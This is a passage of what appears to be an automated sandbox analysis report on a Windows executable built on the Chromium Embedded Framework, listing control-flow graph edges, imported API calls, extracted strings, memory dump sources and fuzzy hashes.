7ff8bfb59879-7ff8bfb59883 1100->1146 1120 7ff8bfb5988d-7ff8bfb59895 1101->1120 1121 7ff8bfb598f3-7ff8bfb59909 call 7ff8bfb5c9d4 1101->1121 1103->1026 1103->1070 1123 7ff8bfb5975b-7ff8bfb5975e 1105->1123 1124 7ff8bfb59764-7ff8bfb5976b 1105->1124 1106->1067 1106->1088 1108->1109 1109->1030 1127 7ff8bfb597d8-7ff8bfb597e5 1110->1127 1128 7ff8bfb597c3-7ff8bfb597c6 1110->1128 1111->1029 1129 7ff8bfb59572-7ff8bfb5957f 1112->1129 1130 7ff8bfb59552-7ff8bfb59555 1112->1130 1113->1094 1114->1113 1131 7ff8bfb5993d-7ff8bfb59947 1114->1131 1115->1116 1132 7ff8bfb596c3-7ff8bfb596c6 1115->1132 1116->1029 1136 7ff8bfb598d9-7ff8bfb598db 1120->1136 1137 7ff8bfb59897-7ff8bfb598ad call 7ff8bfb57494 1120->1137 1121->1030 1123->1124 1123->1131 1124->1075 1127->1029 1128->1131 1141 7ff8bfb597cc-7ff8bfb597d3 1128->1141 1129->1029 1130->1129 1142 7ff8bfb59557-7ff8bfb5955a 1130->1142 1131->1029 1143 7ff8bfb596c8-7ff8bfb596cb 1132->1143 1144 7ff8bfb596d1-7ff8bfb596db 1132->1144 1136->1121 1150 7ff8bfb598dd-7ff8bfb598ee call 7ff8bfb57494 1136->1150 1137->1121 1161 7ff8bfb598af-7ff8bfb598d7 call 7ff8bfb57a60 1137->1161 1141->1075 1142->1026 1142->1040 1143->1131 1143->1144 1144->1029 1145->1146 1146->1030 1150->1121 1161->1121
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+
                                                                                                • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                                                                                • API String ID: 2943138195-1482988683
                                                                                                • Opcode ID: 42bd956a0521df0bb215b1c300124c972e1b6c0f845a56a9a1a0b204cefc3c34
                                                                                                • Instruction ID: 9beb810c392dd75c95d1f46afca499ea04f6a459903b88750cbbc2928c288afc
                                                                                                • Opcode Fuzzy Hash: 42bd956a0521df0bb215b1c300124c972e1b6c0f845a56a9a1a0b204cefc3c34
                                                                                                • Instruction Fuzzy Hash: AA024B72E18A1698FB589FECD8A41BC77B0BB057C4F545136DB0E56A98EF2CB644C340

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1376 7ff7f96f65b0-7ff7f96f6627 cef_string_map_alloc 1377 7ff7f96f662d-7ff7f96f670c call 7ff7f96e3ee0 * 3 call 7ff7f970b3e0 1376->1377 1378 7ff7f96f67ec-7ff7f96f67f0 1376->1378 1471 7ff7f96f6716-7ff7f96f671b 1377->1471 1472 7ff7f96f670e-7ff7f96f6711 1377->1472 1379 7ff7f96f67f2-7ff7f96f67fe call 7ff7f970b4d0 1378->1379 1380 7ff7f96f67ff-7ff7f96f6803 1378->1380 1379->1380 1381 7ff7f96f6805-7ff7f96f6813 1380->1381 1382 7ff7f96f6881-7ff7f96f688c 1380->1382 1388 7ff7f96f6815-7ff7f96f6825 1381->1388 1389 7ff7f96f6868-7ff7f96f687a 1381->1389 1386 7ff7f96f68c5-7ff7f96f68c9 1382->1386 1387 7ff7f96f688e-7ff7f96f689e 1382->1387 1395 7ff7f96f68cb-7ff7f96f68d9 1386->1395 1396 7ff7f96f6947-7ff7f96f694b 1386->1396 1387->1386 1391 7ff7f96f68a0-7ff7f96f68a5 1387->1391 1392 7ff7f96f6863 call 7ff7f97a3d80 1388->1392 1393 7ff7f96f6827-7ff7f96f682a 1388->1393 1389->1382 1397 7ff7f96f68bb-7ff7f96f68c0 1391->1397 1398 7ff7f96f68a7-7ff7f96f68b6 cef_string_map_alloc call 7ff7f97a3c7c 1391->1398 1392->1389 1399 7ff7f96f6833-7ff7f96f683a 1393->1399 1400 7ff7f96f682c-7ff7f96f6832 _invalid_parameter_noinfo_noreturn 1393->1400 1403 7ff7f96f692e-7ff7f96f6940 1395->1403 1404 7ff7f96f68db-7ff7f96f68eb 1395->1404 1401 7ff7f96f6984-7ff7f96f6988 1396->1401 1402 7ff7f96f694d-7ff7f96f695d 1396->1402 1397->1386 1398->1397 1407 7ff7f96f6843-7ff7f96f684a 1399->1407 1408 7ff7f96f683c-7ff7f96f6842 _invalid_parameter_noinfo_noreturn 1399->1408 1400->1399 1413 7ff7f96f6a06-7ff7f96f6a0a 1401->1413 1414 7ff7f96f698a-7ff7f96f6998 1401->1414 1402->1401 1409 7ff7f96f695f-7ff7f96f6964 1402->1409 1403->1396 1411 7ff7f96f68ed-7ff7f96f68f0 1404->1411 1412 7ff7f96f6929 call 7ff7f97a3d80 1404->1412 1418 7ff7f96f6853-7ff7f96f6857 1407->1418 1419 7ff7f96f684c-7ff7f96f6852 _invalid_parameter_noinfo_noreturn 1407->1419 1408->1407 1416 7ff7f96f6966-7ff7f96f6975 cef_string_map_alloc call 7ff7f97a3c7c 1409->1416 1417 7ff7f96f697a-7ff7f96f697f 1409->1417 1421 7ff7f96f68f2-7ff7f96f68f8 _invalid_parameter_noinfo_noreturn 1411->1421 1422 7ff7f96f68f9-7ff7f96f6900 1411->1422 1412->1403 1423 7ff7f96f6a33-7ff7f96f6a3a 1413->1423 1424 7ff7f96f6a0c-7ff7f96f6a17 1413->1424 1425 7ff7f96f69ed-7ff7f96f69ff 1414->1425 1426 7ff7f96f699a-7ff7f96f69aa 1414->1426 1416->1417 1417->1401 1431 7ff7f96f6860 1418->1431 1432 7ff7f96f6859-7ff7f96f685f _invalid_parameter_noinfo_noreturn 1418->1432 1419->1418 1421->1422 1433 7ff7f96f6902-7ff7f96f6908 _invalid_parameter_noinfo_noreturn 1422->1433 1434 7ff7f96f6909-7ff7f96f6910 1422->1434 1427 7ff7f96f6a52-7ff7f96f6a59 1423->1427 1428 7ff7f96f6a3c-7ff7f96f6a51 1423->1428 1424->1423 1435 7ff7f96f6a19-7ff7f96f6a1d 1424->1435 1425->1413 1436 7ff7f96f69ac-7ff7f96f69af 1426->1436 1437 7ff7f96f69e8 call 7ff7f97a3d80 1426->1437 1438 7ff7f96f6a71-7ff7f96f6a77 1427->1438 1439 7ff7f96f6a5b-7ff7f96f6a70 1427->1439 1428->1427 1431->1392 1432->1431 1433->1434 1442 7ff7f96f6912-7ff7f96f6918 _invalid_parameter_noinfo_noreturn 1434->1442 1443 7ff7f96f6919-7ff7f96f691d 1434->1443 1435->1423 1441 7ff7f96f6a1f-7ff7f96f6a32 cef_string_map_alloc call 7ff7f97a3c7c 1435->1441 1444 7ff7f96f69b1-7ff7f96f69b7 _invalid_parameter_noinfo_noreturn 1436->1444 1445 7ff7f96f69b8-7ff7f96f69bf 1436->1445 1437->1425 1451 7ff7f96f6a8f-7ff7f96f6a95 1438->1451 1452 7ff7f96f6a79-7ff7f96f6a8e 1438->1452 1439->1438 1441->1423 1442->1443 1446 7ff7f96f6926 1443->1446 1447 7ff7f96f691f-7ff7f96f6925 _invalid_parameter_noinfo_noreturn 1443->1447 1444->1445 1448 7ff7f96f69c1-7ff7f96f69c7 _invalid_parameter_noinfo_noreturn 1445->1448 1449 7ff7f96f69c8-7ff7f96f69cf 1445->1449 1446->1412 1447->1446 1448->1449 1455 7ff7f96f69d1-7ff7f96f69d7 _invalid_parameter_noinfo_noreturn 1449->1455 1456 7ff7f96f69d8-7ff7f96f69dc 1449->1456 1458 7ff7f96f6aad-7ff7f96f6ad8 call 7ff7f97a3d20 1451->1458 1459 7ff7f96f6a97-7ff7f96f6aac 1451->1459 1452->1451 1455->1456 1463 7ff7f96f69e5 1456->1463 1464 7ff7f96f69de-7ff7f96f69e4 _invalid_parameter_noinfo_noreturn 1456->1464 1459->1458 1463->1437 1464->1463 1473 7ff7f96f6720-7ff7f96f6725 1471->1473 1474 7ff7f96f671d 1471->1474 1472->1471 1475 7ff7f96f672a-7ff7f96f67e9 call 7ff7f96ebf00 * 2 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z call 7ff7f96ebf00 * 5 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z call 7ff7f96ebf00 * 2 1473->1475 1476 7ff7f96f6727 1473->1476 1474->1473 1475->1378 1476->1475
                                                                                                APIs
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96F6620
                                                                                                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF7F96F6770
                                                                                                • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF7F96F67BE
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F682C
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F683C
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F684C
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F6859
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96F68A7
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F68F2
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F6902
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F6912
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F691F
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96F6966
                                                                                                  • Part of subcall function 00007FF7F970B3E0: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF7F970B43B
                                                                                                  • Part of subcall function 00007FF7F970B3E0: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF7F970B46C
                                                                                                  • Part of subcall function 00007FF7F970B3E0: GetLastError.KERNEL32 ref: 00007FF7F970B49E
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F69B1
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F69C1
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F69D1
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96F69DE
                                                                                                • cef_string_map_alloc.LIBCEF ref: 00007FF7F96F6A1F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$U?$char_traits@$D@std@@@std@@cef_string_map_alloc$??6?$basic_ostream@V01@$??0?$basic_ostream@??0?$basic_streambuf@D@std@@@1@_ErrorLastV?$basic_streambuf@
                                                                                                • String ID: browser=$ frame=$ request=$ response.status=$ response.statusText=$?$[OnResourceResponse]$c:\projects\hydra\main\code\contrib\contrib\scene\src\source\cef\client_handler_impl.cpp
                                                                                                • API String ID: 2865712288-1385742800
                                                                                                • Opcode ID: 53f7230bd971caf00079091c7a204c7fedf6cfb11e5048e3a44c5828b7dca608
                                                                                                • Instruction ID: 62455ad4102150101a95b9422dd3116854355c75e5b0ceacbe1249569e03df16
                                                                                                • Opcode Fuzzy Hash: 53f7230bd971caf00079091c7a204c7fedf6cfb11e5048e3a44c5828b7dca608
                                                                                                • Instruction Fuzzy Hash: ADE19172A08B8685EB54EF25DC543A9A376FB44B98F804135DA6D076EDEF3CD48483A0
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$free$cef_string_map_allocmemcpy$mallocmemmove
                                                                                                • String ID: writeCertHolder
                                                                                                • API String ID: 614388589-1003169611
                                                                                                • Opcode ID: c14c586a15bddfdb8530b59ebaa6b24ae1ffb11342b534e436a16f3ce6ed9210
                                                                                                • Instruction ID: 0143f51b3cba9704fe18db535a999f336364b67d96fcf2dbc5749f7e424d15b5
                                                                                                • Opcode Fuzzy Hash: c14c586a15bddfdb8530b59ebaa6b24ae1ffb11342b534e436a16f3ce6ed9210
                                                                                                • Instruction Fuzzy Hash: AD129026A05B4284EB10EF65D8443ADA7B2EB45BD8F944435DE6E07BEDEF38D441C3A0
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc$_invalid_parameter_noinfo_noreturn$freememcpy$mallocmemmove
                                                                                                • String ID: back$forward$reload$scene
                                                                                                • API String ID: 547729093-2287126960
                                                                                                • Opcode ID: a8aca4584c3d962fcf05249f3a7c424cd5c02abbafb34db45185e955f1eff7d9
                                                                                                • Instruction ID: 5ca840b490b9fc70cc2d61067c93f64c92eb2651fd85d168838bd2774a990100
                                                                                                • Opcode Fuzzy Hash: a8aca4584c3d962fcf05249f3a7c424cd5c02abbafb34db45185e955f1eff7d9
                                                                                                • Instruction Fuzzy Hash: 21125062B09B4595EF04EFA5C8543BC6372AF85B88F858435CE2D17BE9EE39D405C3A0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free$isspace$memcpy$mallocmemmove
                                                                                                • String ID:
                                                                                                • API String ID: 4286874901-0
                                                                                                • Opcode ID: a7cacee42fec9bc54e8c85013c6daead1b90f4f637215d6f750a428c02b29c8f
                                                                                                • Instruction ID: d3db989418aac4fc3a5e44de4002a93aecc4a95a53aad9039914fc1f58b9665d
                                                                                                • Opcode Fuzzy Hash: a7cacee42fec9bc54e8c85013c6daead1b90f4f637215d6f750a428c02b29c8f
                                                                                                • Instruction Fuzzy Hash: 04A1E322B08B4241EB21BF21E8403BDA7B2AB45BD4F814131DE6D57BDDCE3DD441A3A5
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free$mallocmemcpymemmove$cef_string_map_alloc
                                                                                                • String ID: URL
                                                                                                • API String ID: 719352336-1657866020
                                                                                                • Opcode ID: 168b038dedbd7a2adf5ab60fb53ede074d21d5be4126ca81a8b5d324e9c0f5d1
                                                                                                • Instruction ID: bb3317f1c69675208d18a8a983611ad99e1f379268230e275c9fe5eb449b5c2c
                                                                                                • Opcode Fuzzy Hash: 168b038dedbd7a2adf5ab60fb53ede074d21d5be4126ca81a8b5d324e9c0f5d1
                                                                                                • Instruction Fuzzy Hash: 45E18E22B09B8189EB00EFA5D8503AC77B2AB45B9CF444535DE3D1BBD8EE38D419C390
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Name::operator+$Replicator::operator[]
                                                                                                • String ID: `anonymous namespace'
                                                                                                • API String ID: 3863519203-3062148218
                                                                                                • Opcode ID: 7b7e9226b92562ce1af46590ad6a9382ebbecfc6adce6f9c26686976aa1ce793
                                                                                                • Instruction ID: d09d7855f9546966c1a13c2cb99a482ebe1e08151631ee3cd887d9f133abbaf9
                                                                                                • Opcode Fuzzy Hash: 7b7e9226b92562ce1af46590ad6a9382ebbecfc6adce6f9c26686976aa1ce793
                                                                                                • Instruction Fuzzy Hash: FBE18B72A08B8699EB10DFA8E8A01EC77A1FB49784F944132EB8D17B95DF3CE555C700
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$cef_string_map_alloc$memset
                                                                                                • String ID: ://
                                                                                                • API String ID: 1954376288-1869659232
                                                                                                • Opcode ID: 3c99838cff2f80900afbfc6a0716ade2ae5093bdf5dba71e4019bd00798dd8e4
                                                                                                • Instruction ID: cfa00dd89f360a685a50651d65feafbf3cb366b22cad0ee2c2766d38ea5475ab
                                                                                                • Opcode Fuzzy Hash: 3c99838cff2f80900afbfc6a0716ade2ae5093bdf5dba71e4019bd00798dd8e4
                                                                                                • Instruction Fuzzy Hash: 63C18432A09B8295EB58EF25EC483A9A371FB44798F804435D66D07ADDEF3CD545C3A0
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$free$cef_string_map_allocmemcpy$mallocmemmove
                                                                                                • String ID: clear$writeCertHolder$writeUrl
                                                                                                • API String ID: 614388589-602964746
                                                                                                • Opcode ID: 83fc9b4681ec39642372cc4b7684638f3dd717f5f945e170e6391de16c446b5e
                                                                                                • Instruction ID: 750c8072e602bc2877c0458dd1ccf096400b2868a100182a37929547178ce345
                                                                                                • Opcode Fuzzy Hash: 83fc9b4681ec39642372cc4b7684638f3dd717f5f945e170e6391de16c446b5e
                                                                                                • Instruction Fuzzy Hash: F1C1BF62B09A4585EF00EF65D8503ADA372EB85BDCF848531DE2E077EDEE28D445C3A0
                                                                                                APIs
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FC2E
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FC82
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FCD2
                                                                                                • _Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B910FD76
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FD93
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FDC9
                                                                                                • _Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B910FDF4
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FE11
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FE3A
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910FE72
                                                                                                  • Part of subcall function 00007FF8B90EB690: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6B2
                                                                                                  • Part of subcall function 00007FF8B90EB690: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6D8
                                                                                                  • Part of subcall function 00007FF8B90EB690: memcpy.VCRUNTIME140(?,?,?,00007FF8B90F84D4), ref: 00007FF8B90EB6F0
                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF8B910FD24
                                                                                                  • Part of subcall function 00007FF8B9116410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8B9116419
